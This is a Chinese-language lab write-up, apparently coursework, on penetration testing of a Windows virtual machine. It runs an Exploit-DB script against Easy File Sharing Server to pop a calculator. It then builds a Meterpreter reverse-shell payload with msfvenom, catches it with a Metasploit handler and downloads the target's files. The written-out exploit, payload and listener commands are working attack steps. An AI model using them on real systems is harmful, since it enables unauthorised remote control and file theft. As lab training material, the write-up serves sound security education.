一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
实验过程:
1.先将easy file sharing server(efssetup_2018.zip)解压到Windows虚拟机中,然后将port改为8000,在URL的IP后加:8000,最后点击restart即可。
2.在kali使用“nmap -sV -A -o easy-file.txt IP”命令实行扫描,可以看到目标靶机运行了easy file sharing服务。
3.输入“searchsploit Easy File Sharing Web Server”搜索可利用的脚本,随机选择一个(此次实验选择了38526.py)。
而后输入“python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 192.168.11.133 8000”即可。
4.成功打开Windows的计算器。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
实验过程:
生成被控端:
1.在kali中输入命令“msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.11.132 lport=5000 -f exe -o /var/payload.exe”。
即在var路径下生成payload.exe文件,其中lhost为kali的IP。
2.把在kali中生成的payload.exe移到windows虚拟机中。
生成主控端:
1.在kali中输入命令“msfconsole”启动Metasploit工具。
2.输入命令“use exploit/multi/handler”。
3.输入命令“set payload windows/meterpreter/reverse_tcp”。
4.依次输入命令“set lhost IP”和“set lport 端口”来设置一个lhost和lport,注意此时的IP和端口要与最开始时的msfvenom命令中的IP和端口保持一致。
获取靶机控制权:
1.输入命令“exploit”开启监听。
2.在Windows中双击文件payload,随后可以看到kali主控端已经连接上了Windows被控端。
下载靶机上的文件:
1.输入命令“ls”,查看Windows上的文件。
2.使用命令“download 文件名”即可下载文件。(此时下载的路径为默认路径)
下载在其他路径(图为下载在var路径)。